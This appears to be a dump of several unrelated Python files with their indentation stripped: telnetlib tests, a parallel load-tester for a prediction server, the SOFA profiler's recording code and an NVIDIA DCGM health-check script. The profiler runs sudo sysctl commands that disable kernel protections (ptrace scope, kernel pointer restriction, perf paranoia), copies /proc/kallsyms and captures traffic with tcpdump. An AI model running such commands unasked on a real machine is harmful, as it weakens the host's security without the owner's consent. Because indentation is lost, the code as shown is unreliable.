def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
def test_main(verbose=None):
support.run_unittest(GeneralTests, ReadTests, WriteTests, OptionTests)
if __name__ == '__main__':
test_main()
|
parallel_requests.py
|
# This script creates parallel processes to send predict requests
import argparse
import json
import requests
import time
from multiprocessing import Process, Queue, Pipe
_predict_endpoint = "/predict/"
_health_endpoint = "/health/"
_statsinternal_endpoint = "/statsinternal/"
_stats_endpoint = "/stats/"
class SenderStats:
def __init__(self, name):
self.name = name
self.requests_to_send = None
self.responses_received = 0
self.requests_failed = 0
self.values_range = []
self.average_request_time = 0
class WorkerStats:
def __init__(self):
self.workers = {}
self.max_mem = 0
self.total_predictions = 0
self.max_avg_prediction_time_on_worker = 0
def request_func(queue, params, name):
stats = SenderStats(name)
stats.requests_to_send = params["requests"]
with_dr = False
if "api-key" in params and "datarobot-key" in params:
headers = {
"Content-Type": "text/plain; charset=UTF-8",
}
headers.update({"Authorization": "Bearer {}".format(params["api-key"])})
headers.update({"DataRobot-Key": "{}".format(params["datarobot-key"])})
with_dr = True
request_time_sum = 0
for _ in range(params["requests"]):
with open(params["input"]) as f:
start_time = time.time()
if not with_dr:
try:
response = requests.post(params["url"] + _predict_endpoint, files={"X": f})
except requests.exceptions.ReadTimeout:
                    stats.requests_failed += 1
                    continue
else:
data = f.read()
response = requests.post(params["url"], data=data, headers=headers)
end_time = time.time()
request_time = end_time - start_time
request_time_sum += request_time
if response.ok:
stats.responses_received += 1
if not with_dr:
response_value = response.json()["predictions"][0]
try:
response_value = int(response_value)
if response_value not in stats.values_range:
stats.values_range.append(response_value)
except TypeError:
pass
else:
response_value = response.json()["data"][0]["prediction"]
try:
response_value = int(response_value)
if response_value not in stats.values_range:
stats.values_range.append(response_value)
except TypeError:
pass
else:
stats.requests_failed += 1
stats.average_request_time = request_time_sum / stats.requests_to_send
queue.put(stats)
def stats_func(pipe, server_url):
worker_stats = WorkerStats()
while True:
for _ in range(10):
time.sleep(0.1)
response = requests.post(server_url + _statsinternal_endpoint)
if response.ok:
dd = json.loads(response.text)
worker_id = dd["sys_info"]["wuuid"]
predict_calls_count = dd["predict_calls_per_worker"]
worker_stats.workers[str(worker_id)] = predict_calls_count
worker_stats.total_predictions = dd["predict_calls_total"]
response = requests.get(server_url + _stats_endpoint)
if response.ok:
dd = json.loads(response.text)
try:
worker_stats.max_mem = max(dd["mem_info"]["drum_rss"], worker_stats.max_mem)
except TypeError:
pass
if "time_info" in dd:
avg_time = dd["time_info"]["run_predictor_total"]["avg"]
if avg_time:
worker_stats.max_avg_prediction_time_on_worker = max(
avg_time, worker_stats.max_avg_prediction_time_on_worker,
)
o = ""
if pipe.poll():
o = pipe.recv()
if o == "shutdown":
pipe.send(worker_stats)
break
time.sleep(2)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Parallel requests sender")
parser.add_argument("--input", required=True, help="Input dataset")
parser.add_argument("--api-key", required=False, default=None, help="API key")
parser.add_argument("--datarobot-key", required=False, default=None, help="Datarobot key")
parser.add_argument("--requests", default=1, type=int, help="Number of requests")
parser.add_argument("--threads", default=1, type=int, help="Number of clients")
parser.add_argument(
"--address", default=None, required=True, help="Prediction server address with http:\\"
)
args = parser.parse_args()
remainder = args.requests % args.threads
if remainder:
requests_per_thread = int(args.requests / args.threads) + 1
else:
requests_per_thread = int(args.requests / args.threads)
params = {"requests": requests_per_thread, "input": args.input, "url": args.address}
fetch_and_show_uwsgi_stats = True
if args.api_key and args.datarobot_key:
params.update({"api-key": args.api_key})
params.update({"datarobot-key": args.datarobot_key})
fetch_and_show_uwsgi_stats = False
processes = []
q = Queue()
if fetch_and_show_uwsgi_stats:
main_conn, worker_stats_conn = Pipe()
stats_thread = Process(target=stats_func, args=(worker_stats_conn, args.address,),)
stats_thread.start()
for i in range(args.threads):
p = Process(target=request_func, args=(q, params, i,),)
processes.append(p)
p.start()
start_time = time.time()
for p in processes:
p.join()
if fetch_and_show_uwsgi_stats:
main_conn.send("shutdown")
stats_thread.join()
workers_stats = main_conn.recv()
total_requests = 0
total_responses = 0
total_failed = 0
for i in range(args.threads):
stats = q.get()
print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print("Stats from sender: {}".format(stats.name))
print(" Requests to send: {}".format(stats.requests_to_send))
print(" Requests succeeded: {}".format(stats.responses_received))
print(" Requests failed: {}".format(stats.requests_failed))
print(" Avg. request time: {}".format(stats.average_request_time))
print(" Response values: {}".format(stats.values_range))
print("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n\n")
total_requests += stats.requests_to_send
total_responses += stats.responses_received
total_failed += stats.requests_failed
print("Summary:")
print(" Total to send: {}".format(total_requests))
print(" Total succeeded: {}".format(total_responses))
print(" Total failed: {}".format(total_failed))
print(" Total run time: {:0.2f} s".format(time.time() - start_time))
if fetch_and_show_uwsgi_stats:
print(" Max mem: {:0.2f} MB".format(workers_stats.max_mem))
print(
" Max avg pred time: {:0.4f} s".format(
workers_stats.max_avg_prediction_time_on_worker
)
)
if fetch_and_show_uwsgi_stats:
print("\n\nWorkers stats:")
total_predicted_on_workers = 0
for key, value in workers_stats.workers.items():
if key != "total":
print(" worker: {}; predicsts: {}".format(key, value))
total_predicted_on_workers += value
print("\n")
print("Total predicted on workers: {}".format(total_predicted_on_workers))
print(
"Total predicted on workers (metrics by uwsgi): {}".format(
workers_stats.total_predictions
)
)
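# Illustrative invocation (hypothetical file name and address, adjust to your setup):
#   python parallel_requests.py --input ./data.csv --requests 100 --threads 4 \
#       --address http://localhost:6788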
|
sofa_record.py
|
import argparse
import csv
import datetime
import glob
import json
import multiprocessing as mp
import os
import subprocess
from subprocess import DEVNULL
from subprocess import PIPE
import sys
import threading
import time
from functools import partial
from pwd import getpwuid
import pandas as pd
import numpy as np
import re
import getpass
import pexpect
import random
from sofa_print import *
def service_get_cpuinfo(logdir):
next_call = time.time()
while True:
#print(datetime.datetime.now())
next_call = next_call + 0.1;
get_cpuinfo(logdir)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
def service_get_mpstat(logdir):
next_call = time.time()
while True:
next_call = next_call + 0.1;
get_mpstat(logdir)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
def service_get_diskstat(logdir):
next_call = time.time()
while True:
next_call = next_call + 0.1;
get_diskstat(logdir)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
def service_get_netstat(logdir, interface):
next_call = time.time()
while True:
next_call = next_call + 0.1
get_netstat(logdir, interface)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
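# The four service_get_* helpers above share one sampling pattern: the next wake-up time is
# advanced in fixed 0.1 s steps and the thread sleeps only for the remaining interval, so the
# roughly 10 Hz sampling rate does not drift when an individual collection call takes time.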
def get_cpuinfo(logdir):
with open('/proc/cpuinfo','r') as f:
lines = f.readlines()
mhz = 1000
for line in lines:
if line.find('cpu MHz') != -1:
mhz = float(line.split()[3])
break
with open('%s/cpuinfo.txt' % logdir, 'a') as logfile:
unix_time = time.time()
logfile.write(str('%.9lf %lf'%(unix_time,mhz)+'\n'))
def get_mpstat(logdir):
with open('/proc/stat','r') as f:
lines = f.readlines()
stat_list = []
unix_time = time.time()
cpu_id = -1
for line in lines:
if line.find('cpu') != -1:
#cpu, user,nice, system, idle, iowait, irq, softirq
#example: cat /proc/stat
# cpu 36572 0 10886 2648245 1047 0 155 0 0 0
# cpu0 3343 0 990 332364 177 0 80 0 0 0
m = line.split()
stat_list.append([unix_time,cpu_id]+m[1:8])
cpu_id = cpu_id + 1
else:
break
stat = np.array(stat_list)
df_stat = pd.DataFrame(stat)
df_stat.to_csv("%s/mpstat.txt" % logdir, mode='a', header=False, index=False, index_label=False)
def get_diskstat(logdir):
with open('/proc/diskstats','r') as f:
lines = f.readlines()
stat_list = []
unix_time = time.time()
for line in lines:
m = line[:-1]
m = line.split()
if re.search(r'sd\D$',m[2]):
stat_list.append([unix_time]+[m[2]]+[m[5]]+[m[9]])
df_stat = pd.DataFrame(stat_list)
df_stat.to_csv("%s/diskstat.txt" % logdir, mode='a', header=False, index=False, index_label=False)
def get_netstat(logdir, interface):
if interface == '':
return
with open('/sys/class/net/%s/statistics/tx_bytes' %interface, 'r') as f:
net_time = time.time()
tx_line = f.readline().splitlines()
[tx] = tx_line
with open('/sys/class/net/%s/statistics/rx_bytes' %interface, 'r') as f:
rx_line = f.readline().splitlines()
[rx] = rx_line
tt = [net_time, tx, rx]
content = pd.DataFrame([tt], columns=['timestamp', 'tx_bytes', 'rx_bytes'])
content.to_csv("%s/netstat.txt" % logdir, mode='a', header=False, index=False, index_label=False)
def kill_pcm_modules(cfg, p_pcm_pcie, p_pcm_memory, p_pcm_numa):
if p_pcm_pcie != None:
p_pcm_pcie.terminate()
os.system('yes|pkill pcm-pcie.x')
print_info(cfg,"tried killing pcm-pcie.x")
if p_pcm_memory != None:
p_pcm_memory.terminate()
os.system('yes|pkill pcm-memory.x')
print_info(cfg,"tried killing pcm-memory.x")
if p_pcm_numa != None:
p_pcm_numa.terminate()
os.system('yes|pkill pcm-numa.x')
print_info(cfg,"tried killing pcm-numa.x")
def sofa_clean(cfg):
logdir = cfg.logdir
print_info(cfg,'Clean previous logged files')
subprocess.call('rm %s/gputrace.tmp > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.html > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.js > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.script > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.tmp > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.csv > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/network_report.pdf > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
def sofa_record(command, cfg):
p_perf = None
p_tcpdump = None
p_mpstat = None
p_diskstat = None
p_netstat = None
p_vmstat = None
p_blktrace = None
p_cpuinfo = None
p_nvprof = None
p_nvsmi = None
p_nvsmi_query = None
p_nvtopo = None
p_pcm_pcie = None
p_pcm_memory = None
p_pcm_numa = None
logdir = cfg.logdir
if cfg.ds:
tmp_dir = str(random.randrange(100000))
logdir = cfg.logdir + "ds_finish/"+ tmp_dir + '/'
p_strace = None
p_pystack = None
print_info(cfg,'SOFA_COMMAND: %s' % command)
sample_freq = 99
command_prefix = ''
os.system('sudo sysctl -w kernel.yama.ptrace_scope=0')
os.system('sudo sysctl -w kernel.kptr_restrict=0')
os.system('sudo sysctl -w kernel.perf_event_paranoid=-1')
if int(open("/proc/sys/kernel/yama/ptrace_scope").read()) != 0:
print_error(
"Could not attach to process, please try the command below:")
print_error("sudo sysctl -w kernel.yama.ptrace_scope=0")
sys.exit(1)
if int(open("/proc/sys/kernel/kptr_restrict").read()) != 0:
print_error(
"/proc/kallsyms permission is restricted, please try the command below:")
print_error("sudo sysctl -w kernel.kptr_restrict=0")
sys.exit(1)
if int(open("/proc/sys/kernel/perf_event_paranoid").read()) != -1:
        print_error('PerfEvent is not available, please try the command below:')
print_error('sudo sysctl -w kernel.perf_event_paranoid=-1')
sys.exit(1)
if cfg.enable_pcm:
print_info(cfg,'Test Capability of PCM programs ...')
ret = str(subprocess.check_output(['getcap `which pcm-memory.x`'], shell=True))
if ret.find('cap_sys_rawio+ep') == -1:
            print_error('Reading/writing MSRs from userspace is not available, please try the commands below:')
print_error('sudo modprobe msr')
print_error('sudo setcap cap_sys_rawio=ep `which pcm-memory.x`')
sys.exit(1)
if subprocess.call(['mkdir', '-p', logdir]) != 0:
        print_error('Cannot create the directory ' + logdir + ', which is needed for the SOFA log files.')
sys.exit(1)
    print_info(cfg,'Read NMI watchdog status ...')
nmi_output = ""
try:
with open(logdir+"nmi_status.txt", 'w') as f:
p_pcm_pcie = subprocess.Popen(['yes | timeout 3 pcm-pcie.x'], shell=True, stdout=f)
if p_pcm_pcie != None:
p_pcm_pcie.kill()
print_info(cfg,"tried killing pcm-pcie.x")
os.system('pkill pcm-pcie.x')
with open(logdir+"nmi_status.txt", 'r') as f:
lines = f.readlines()
if len(lines) > 0:
if lines[0].find('Error: NMI watchdog is enabled.') != -1:
                print_error('NMI watchdog is enabled. Please try the command below:')
print_error('sudo sysctl -w kernel.nmi_watchdog=0')
# output = subprocess.check_output('yes | timeout 3 pcm-pcie.x 2>&1', shell=True)
except subprocess.CalledProcessError as e:
print_warning("There was error while reading NMI status.")
print_info(cfg,'Clean previous logged files')
# Not equal to sofa_clean(...) !!
subprocess.call('rm %s/perf.data > /dev/null 2> /dev/null' % logdir, shell=True )
subprocess.call('rm %s/cuhello.perf.data > /dev/null 2> /dev/null' % logdir, shell=True )
subprocess.call('rm %s/sofa.pcap > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/gputrace*.nvvp > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/cuhello*.nvvp > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/gputrace.tmp > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/*.csv > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/*.txt > /dev/null 2> /dev/null' % logdir, shell=True)
try:
print_progress("Prologue of Recording...")
if int(os.system('command -v nvprof 1> /dev/null')) == 0:
p_nvprof = subprocess.Popen(['nvprof', '--profile-all-processes', '-o', logdir+'/gputrace%p.nvvp'], stderr=DEVNULL, stdout=DEVNULL)
print_info(cfg,'Launching nvprof')
time.sleep(3)
print_info(cfg,'nvprof is launched')
else:
print_warning('Profile without NVPROF')
if cfg.enable_pcm:
with open(os.devnull, 'w') as FNULL:
delay_pcie = 0.02
#p_pcm_pcie = subprocess.Popen(['yes|pcm-pcie.x ' + str(delay_pcie) + ' -csv=sofalog/pcm_pcie.csv -B '], shell=True)
p_pcm_memory = subprocess.Popen(['yes|pcm-memory.x ' + str(delay_pcie) + ' -csv=sofalog/pcm_memory.csv '], shell=True)
#p_pcm_numa = subprocess.Popen(['yes|pcm-numa.x ' + str(delay_pcie) + ' -csv=sofalog/pcm_numa.csv '], shell=True)
print_progress("Recording...")
if cfg.profile_all_cpus == True:
perf_options = '-a'
else:
perf_options = ''
if cfg.ds:
os.system('sudo ntpd -u ntp:ntp')
os.system('sudo ntpq -p')
ds_prof = subprocess.call(['sudo', 'sleep', '1'])
#os.system('sudo %s/bpf_ds.py > %sds_trace&'%(cfg.script_path,logdir))
#os.system('sudo %s/dds.py > %sdds_trace&'%(cfg.script_path,logdir))
os.system('sudo %s/DDS/bpf_ds_dds.py > %sds_dds_trace&'%(cfg.script_path,logdir))
os.system('basename %s > %scommand.txt' % (command, logdir))
subprocess.call('cp /proc/kallsyms %s/' % (logdir), shell=True )
subprocess.call('chmod +w %s/kallsyms' % (logdir), shell=True )
print_info(cfg,"Script path of SOFA: "+cfg.script_path)
with open(logdir+'/perf_timebase.txt', 'w') as logfile:
subprocess.call('%s/sofa_perf_timebase' % (cfg.script_path), shell=True, stderr=logfile, stdout=logfile)
subprocess.call('nvprof --profile-child-processes -o %s/cuhello%%p.nvvp -- perf record -q -o %s/cuhello.perf.data %s/cuhello' % (logdir,logdir,cfg.script_path), shell=True, stderr=DEVNULL, stdout=DEVNULL)
if int(os.system('perf 2>&1 1>/dev/null')) == 0:
subprocess.call('nvprof --profile-child-processes -o %s/cuhello%%p.nvvp -- perf record -q -o %s/cuhello.perf.data %s/cuhello' % (logdir,logdir,cfg.script_path), shell=True, stderr=DEVNULL, stdout=DEVNULL)
else:
subprocess.call('nvprof --profile-child-processes -o %s/cuhello%%p.nvvp -- /usr/bin/time -v %s/cuhello' % (logdir,cfg.script_path), shell=True, stderr=DEVNULL, stdout=DEVNULL)
# sofa_time is time base for vmstat, nvidia-smi
with open('%s/sofa_time.txt' % logdir, 'w') as logfile:
unix_time = time.time()
logfile.write(str('%.9lf'%unix_time)+'\n')
with open('%s/vmstat.txt' % logdir, 'w') as logfile:
p_vmstat = subprocess.Popen(['vmstat', '-w', '1'], stdout=logfile)
if cfg.blktrace_device is not None:
p_blktrace = subprocess.Popen(['blktrace', '-d', '/dev/%s' % cfg.blktrace_device], stdout=DEVNULL)
with open('%s/cpuinfo.txt' % logdir, 'w') as logfile:
logfile.write('')
timerThread = threading.Thread(target=service_get_cpuinfo, args=[logdir])
timerThread.daemon = True
timerThread.start()
with open('%s/mpstat.txt' % logdir, 'w') as logfile:
logfile.write('time,cpu,user,nice,system,idle,iowait,irq,softirq\n')
timerThread = threading.Thread(target=service_get_mpstat, args=[logdir])
timerThread.daemon = True
timerThread.start()
with open('%s/diskstat.txt' % logdir, 'w') as logfile:
logfile.write('')
timerThread = threading.Thread(target=service_get_diskstat, args=[logdir])
timerThread.daemon = True
timerThread.start()
with open('%s/netstat.txt' % logdir, 'w') as logfile:
logfile.write('')
interface = subprocess.check_output("ip addr | awk '/state UP/{print $2}'", shell=True)
interface = str(interface, 'utf-8')
if cfg.netstat_interface is not None:
interface = cfg.netstat_interface
else:
interface = interface.split(':')[0]
timerThread = threading.Thread(target=service_get_netstat, args=[logdir, interface])
timerThread.daemon = True
timerThread.start()
if cfg.enable_tcpdump:
with open(os.devnull, 'w') as FNULL:
p_tcpdump = subprocess.Popen(["tcpdump",
'-i',
'any',
'-w',
'%s/sofa.pcap' % logdir],
stderr=FNULL)
if int(os.system('command -v nvidia-smi 1>/dev/null')) == 0:
with open('%s/nvsmi.txt' % logdir, 'w') as logfile:
p_nvsmi = subprocess.Popen(['nvidia-smi', 'dmon', '-s', 'u'], stdout=logfile)
with open('%s/nvsmi_query.txt' % logdir, 'w') as logfile:
p_nvsmi_query = subprocess.Popen(['nvidia-smi', '--query-gpu=timestamp,gpu_name,index,utilization.gpu,utilization.memory',
'-lms', '100', '--format=csv'], stdout=logfile)
with open('%s/nvlink_topo.txt' % logdir, 'w') as logfile:
p_nvtopo = subprocess.Popen(['nvidia-smi', 'topo', '-m'], stdout=logfile)
# Primary Profiled Program
if cfg.pid > 0 :
target_pid = cfg.pid
else:
target_pid = -1
t_command_begin = time.time()
print_hint('PID of the target program: %d' % target_pid)
print_hint('Command: %s' % command)
if cfg.enable_py_stacks:
if command.find('python') == -1:
print_warning("Not a python program to recorded, skip recording callstacks")
elif cfg.enable_strace:
print_warning("Only one of --enable_py_stacks or --enable_strace option holds, ignore --enable_py_stack options")
else:
# command_prefix = ' '.join(['py-spy','-n', '-s', '{}/pystacks.txt'.format(logdir), '-d', str(sys.maxsize), '--']) + ' '
command_prefix = ' '.join(['pyflame', '--flamechart', '-o', '{}pystacks.txt'.format(logdir), '-t']) + ' '
if cfg.enable_strace:
command_prefix = ' '.join(['strace', '-q', '-T', '-t', '-tt', '-f', '-o', '%s/strace.txt'%logdir]) + ' '
if cfg.ds:
bpf_timebase = open(logdir + '/bpf_timebase.txt', 'w')
subprocess.call('%s/real_mono_diff' % (cfg.script_path), shell=True, stderr=bpf_timebase, stdout=bpf_timebase)
if int(os.system('command -v perf 1> /dev/null')) == 0:
ret = str(subprocess.check_output(['perf stat -e cycles ls 2>&1 '], shell=True))
if ret.find('not supported') >=0:
profile_command = 'perf record -o %s/perf.data -F %s %s %s' % (logdir, sample_freq, perf_options, command_prefix+command)
cfg.perf_events = ""
else:
profile_command = 'perf record -o %s/perf.data -e %s -F %s %s %s' % (logdir, cfg.perf_events, sample_freq, perf_options, command_prefix+command)
else:
print_warning("Use /usr/bin/time to measure program performance instead of perf.")
profile_command = '/usr/bin/time -v %s' % (command_prefix+command)
cfg.perf_events = ""
with open(logdir+'perf_events_used.txt','w') as f:
f.write(cfg.perf_events)
print_hint(profile_command)
p_perf = subprocess.Popen(profile_command, shell=True)
try:
p_perf.wait()
t_command_end = time.time()
        except subprocess.TimeoutExpired:
print_error('perf: Timeout of profiling process')
sys.exit(1)
with open('%s/misc.txt' % logdir, 'w') as f_misc:
vcores = 0
cores = 0
with open('/proc/cpuinfo','r') as f:
lines = f.readlines()
vcores = 0
cores = 0
for line in lines:
if line.find('cpu cores') != -1:
cores = int(line.split()[3])
vcores = vcores + 1
f_misc.write('elapsed_time %.6lf\n' % (t_command_end - t_command_begin))
f_misc.write('cores %d\n' % (cores))
f_misc.write('vcores %d\n' % (vcores))
f_misc.write('pid %d\n' % (target_pid))
print_progress("Epilogue of Recording...")
if p_tcpdump != None:
p_tcpdump.terminate()
print_info(cfg,"tried terminating tcpdump")
if p_vmstat != None:
p_vmstat.terminate()
print_info(cfg,"tried terminating vmstat")
if p_blktrace != None:
p_blktrace.terminate()
if cfg.blktrace_device is not None:
os.system('sudo blkparse -i %s -o %s/blktrace.txt > /dev/null' % (cfg.blktrace_device,logdir))
os.system('rm -rf %s.blktrace.*' % cfg.blktrace_device)
print_info(cfg,"tried terminating blktrace")
if p_cpuinfo != None:
p_cpuinfo.terminate()
print_info(cfg,"tried terminating cpuinfo")
if p_mpstat != None:
p_mpstat.terminate()
print_info(cfg,"tried terminating mpstat")
if p_diskstat != None:
p_diskstat.terminate()
print_info(cfg,"tried terminating diskstat")
if p_netstat != None:
p_netstat.terminate()
print_info(cfg,"tried terminating netstat")
if p_nvtopo != None:
p_nvtopo.terminate()
print_info(cfg,"tried terminating nvidia-smi topo")
if p_nvsmi != None:
if p_nvsmi.poll() is None:
p_nvsmi.terminate()
print_info(cfg,"tried terminating nvidia-smi dmon")
else:
open('%s/nvsmi.txt' % logdir, 'a').write('\nFailed\n')
if p_nvsmi_query != None:
if p_nvsmi_query.poll() is None:
p_nvsmi_query.terminate()
print_info(cfg,"tried terminating nvidia-smi query")
else:
open('%s/nvsmi_query.txt' % logdir, 'a').write('\nFailed\n')
if p_nvprof != None:
p_nvprof.terminate()
print_info(cfg,"tried terminating nvprof")
if cfg.enable_pcm:
kill_pcm_modules(cfg, p_pcm_pcie, p_pcm_memory, p_pcm_numa)
if p_strace != None:
p_strace.terminate()
print_info(cfg,"tried terminating strace")
if cfg.ds:
#os.system('sudo pkill bpf')
#os.system('sudo pkill dds')
os.system('sudo pkill bpf_ds_dds')
with open(logdir + 'pid.txt', 'w') as pidfd:
subprocess.call(['perf', 'script', '-i%sperf.data'%logdir, '-F', 'pid'], stdout=pidfd)
pidAsNodeName = None
with open(logdir + 'pid.txt') as pidfd:
pidAsNodeName = int(pidfd.readline())
os.system('mv %s %sds_finish/%d/' % (logdir, cfg.logdir, pidAsNodeName))
os.system('rm perf.data')
except BaseException:
print("Unexpected error:", sys.exc_info()[0])
if p_tcpdump != None:
p_tcpdump.kill()
print_info(cfg,"tried killing tcpdump")
if p_vmstat != None:
p_vmstat.kill()
print_info(cfg,"tried killing vmstat")
if p_blktrace != None:
p_blktrace.terminate()
if cfg.blktrace_device is not None:
os.system('sudo blkparse -i %s -o %s/blktrace.txt > /dev/null' % (cfg.blktrace_device,logdir))
os.system('rm -rf %s.blktrace.*' % cfg.blktrace_device)
print_info(cfg,"tried terminating blktrace")
if p_cpuinfo != None:
p_cpuinfo.kill()
print_info(cfg,"tried killing cpuinfo")
if p_mpstat != None:
p_mpstat.kill()
print_info(cfg,"tried killing mpstat")
if p_diskstat != None:
p_diskstat.kill()
print_info(cfg,"tried killing diskstat")
if p_netstat != None:
p_netstat.kill()
print_info(cfg, "tried killing netstat")
if p_nvtopo != None:
p_nvtopo.kill()
print_info(cfg,"tried killing nvidia-smi topo")
if p_nvsmi != None:
p_nvsmi.kill()
print_info(cfg,"tried killing nvidia-smi dmon")
if p_nvsmi_query != None:
p_nvsmi_query.kill()
print_info(cfg,"tried killing nvidia-smi query")
if p_nvprof != None:
p_nvprof.kill()
print_info(cfg,"tried killing nvprof")
if cfg.enable_pcm:
kill_pcm_modules(cfg, p_pcm_pcie, p_pcm_memory, p_pcm_numa)
if p_strace != None:
p_strace.kill()
print_info(cfg,"tried killing strace")
raise
print_progress("End of Recording")
|
dcgm_health_check.py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../')
import dcgm_structs
import dcgm_fields
import dcgm_agent
import dcgmvalue
from threading import Thread
from time import sleep
## Look at __name__ == "__main__" for entry point to the script
class RunDCGM():
def __init__(self, ip, opMode):
self.ip = ip
self.opMode = opMode
def __enter__(self):
dcgm_structs._dcgmInit()
self.handle = dcgm_agent.dcgmInit()
return self.handle
def __exit__(self, eType, value, traceback):
dcgm_agent.dcgmShutdown()
## Helper method to convert enum to system name
def helper_convert_system_enum_to_sytem_name(system):
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PCIE):
return "PCIe"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_NVLINK):
return "NvLink"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PMU):
return "PMU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MCU):
return "MCU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MEM):
return "MEM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_SM):
return "SM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_INFOROM):
return "Inforom"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_THERMAL):
return "Thermal"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_POWER):
return "Power"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_DRIVER):
return "Driver"
## Helper method to convert a health return value to a string for display purposes
def convert_overall_health_to_string(health):
if health == dcgm_structs.DCGM_HEALTH_RESULT_PASS:
return "Pass"
elif health == dcgm_structs.DCGM_HEALTH_RESULT_WARN:
return "Warn"
